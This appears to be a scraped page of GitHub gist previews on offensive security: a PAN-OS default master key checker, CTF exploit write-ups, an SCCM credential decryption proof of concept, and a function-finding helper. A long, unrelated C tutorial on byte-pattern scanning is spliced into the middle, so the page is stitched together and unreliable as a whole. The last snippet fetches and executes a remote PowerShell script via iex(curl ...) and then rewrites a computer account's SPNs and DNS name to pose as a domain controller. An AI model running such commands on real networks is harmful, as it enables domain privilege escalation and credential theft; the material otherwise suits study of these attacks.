Neoma Fong neomafo88
@rqu1
rqu1 / checkmk.py
Last active August 4, 2024 16:42
Check if a PAN firewall is using the default master key when GlobalProtect is enabled
from hashlib import md5, sha1
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.backends import default_backend
from base64 import b64encode, b64decode
import sys, time
import requests
DEFAULT_MASTERKEY=b'p1a2l3o4a5l6t7o8'
class PanCrypt():
@d0now
d0now / 2022-HTB-BUSINESS-CTF-Midenios.md
Last active August 23, 2022 06:18
2022 HackTheBox Business CTF Midenios
  • My first time firefox js exploit
  • Not an intended way, but I was fast (first blood)
import os
import sys
"""
This (pure!) python script streams a gzip-compressed YUV4MPEG video to stdout.
It easily runs at 1080p60fps on my machine.
Pipe it into a media player like this:
python3 gzip_swar_life.py | mbuffer | gunzip - | mpv -

Google CTF 2022 Pwn d8 Author's Write-up

This year I made the pwn challenge "d8" in Google CTF 2022. d8 lets you upload and run a piece of v8 code cache. The goal is to craft a code cache that achieves arbitrary code execution.

The v8 code cache is a format for serializing the v8 heap so that it can later be deserialized back into the v8 heap. This improves JS loading time when the same piece of code is reused.

The format of the v8 code cache is quite interesting. It doesn't directly serialize the v8 objects in the heap; instead it uses a bytecode that describes how to reconstruct those objects. There is a series of blog posts by PT SWARM about how it works, and it is definitely worth reading.

When studying the v8 code cache, I realized there is neither the boundary check in the deserializer, nor a validator to verify if the constructed v8 objects are legal, which

@hgarrereyn
hgarrereyn / lifter.py
Created July 4, 2022 04:31
Lifter solution to GoogleCTF 2022 eldar
# Author: hgarrereyn
# Desc: Lifter solution for GoogleCTF 2022 eldar
import lief
from collections import namedtuple
from dataclasses import dataclass
from typing import Any
from capstone import *
from z3 import *
import numpy as np
@xpn
xpn / sccmdecryptpoc.cs
Last active June 28, 2025 20:01
SCCM Account Password Decryption POC
// Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;)
// Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work.
using System;
using System.Collections.Generic;
using System.Runtime.InteropServices;
namespace SCCMDecryptPOC
{
internal class Program
@janoglezcampos
janoglezcampos / find_function.cpp
Last active May 23, 2025 06:17
Find non exported functions in a module using masks.
#include <windows.h>
#include <stdio.h>
#include <psapi.h>
typedef char * (*ParseHeaders)(LPCSTR, int *);
BOOL bCompare(const BYTE* pData, const BYTE* bMask, const char* szMask)
{
for (; *szMask; ++szMask, ++pData, ++bMask)
if (*szMask == 'x' && *pData != *bMask)
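The mask comparison above is the core of a signature scan: each position in the mask is either 'x' (the byte must equal the pattern byte) or '?' (any byte, used for immediates, displacements and relocated addresses). The preview stops before the search loop, and the piece a practitioner most needs to get right is that loop's bound: the comparison itself never checks length, so the caller must stop `strlen(mask)` bytes before the end of the region or the scan reads past it. The following is an added, portable C example (not the gist's code, and not Windows-specific) that implements the same mask compare plus a bounded search, run over a constructed byte buffer standing in for a module's code section; the sample bytes and the `find_func_b` / `find_past_end` helpers are constructed for illustration.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/*
 * Mask-based byte-pattern search. In the mask, 'x' means the byte must
 * match the pattern byte and '?' means "any byte" (wildcarded immediates,
 * displacements, relocated addresses).
 */
static int mask_compare(const uint8_t *data, const uint8_t *pattern, const char *mask)
{
    for (; *mask; ++mask, ++data, ++pattern)
        if (*mask == 'x' && *data != *pattern)
            return 0;
    return 1;
}

/*
 * Return the offset of the first match inside region[0..size), or -1 if none.
 * The loop bound (off + plen <= size) keeps every mask_compare() call fully
 * inside the region; without it the scan reads past the end of the mapping.
 */
long find_pattern(const uint8_t *region, size_t size, const uint8_t *pattern, const char *mask)
{
    size_t plen = strlen(mask);
    if (plen == 0 || plen > size)
        return -1;
    for (size_t off = 0; off + plen <= size; ++off)
        if (mask_compare(region + off, pattern, mask))
            return (long)off;
    return -1;
}

/*
 * Constructed sample region (not a real module): two small x86-64 functions
 * with a standard prologue; the second one loads from rip-relative memory.
 */
static const uint8_t sample_region[] = {
    /* func A */ 0x55, 0x48, 0x89, 0xE5, 0x31, 0xC0, 0x5D, 0xC3,
    /* pad    */ 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
    /* func B */ 0x55, 0x48, 0x89, 0xE5,
                 0x48, 0x8B, 0x05, 0x78, 0x56, 0x34, 0x12, /* mov rax,[rip+0x12345678] */
                 0x5D, 0xC3,
};

/*
 * Signature for "func B": prologue, then mov rax,[rip+disp32] with the
 * 4-byte displacement wildcarded because it changes per build/link address.
 */
static const uint8_t sig_movrip[] = {
    0x55, 0x48, 0x89, 0xE5, 0x48, 0x8B, 0x05, 0x00, 0x00, 0x00, 0x00
};
static const char mask_movrip[] = "xxxxxxx????";

/* Locate func B in the constructed region (expected offset 16). */
long find_func_b(void)
{
    return find_pattern(sample_region, sizeof sample_region, sig_movrip, mask_movrip);
}

/*
 * Probe a pattern whose only candidate start is too close to the end of the
 * region: the bounded loop must report "not found" rather than read past it.
 */
long find_past_end(void)
{
    static const uint8_t sig[] = { 0x5D, 0xC3, 0x90, 0x90 };
    return find_pattern(sample_region, sizeof sample_region, sig, "xxxx");
}

int main(void)
{
    printf("func B at offset %ld\n", find_func_b());
    printf("past-end probe: %ld\n", find_past_end());
    return 0;
}
```

On a real target, `region`/`size` come from the module's image base and size (for example from `GetModuleInformation` on Windows or the mapped ELF segment on Linux), and the signature is taken from a disassembly with every address-dependent byte wildcarded; the prologue-only prefix here would match many functions, so a useful signature includes enough instruction bytes after it to be unique.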
@NyaMisty
NyaMisty / jeb-shortcuts.cfg
Created May 15, 2022 15:20
Better JEB Shortcut
#*TEMPLATE*
#*TEMPLATE* Rename or copy this file without the .TEMPLATE extension
#*TEMPLATE*
#------------------------------------------------------------------------------
# JEB Custom Keyboard Shortcuts
#------------------------------------------------------------------------------
# Uncomment and add your own keyboard shortcuts for the actions for which you'd like to override the default shortcuts
# Example: by default, Jump is mapped to the 'G' key; the following line (minus the # character) can be used to remap the action to CTRL+J:
#jump=Ctrl+J
iex(curl https://raw.githubusercontent.com/samratashok/ADModule/master/Import-ActiveDirectory.ps1 -UseBasicParsing )
Import-ActiveDirectory
Set-ADComputer WIN-JQTB1UHHF2S -ServicePrincipalNames @{REPLACE="HOST/WIN-JQTB1UHHF2S","RestrictedKrbHost/WIN-JQTB1UHHF2S"} -Verbose
# In my testing I had to set DNSHostName to $null first
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName $null
Set-ADComputer WIN-JQTB1UHHF2S -DNSHostName dc1.batcave.local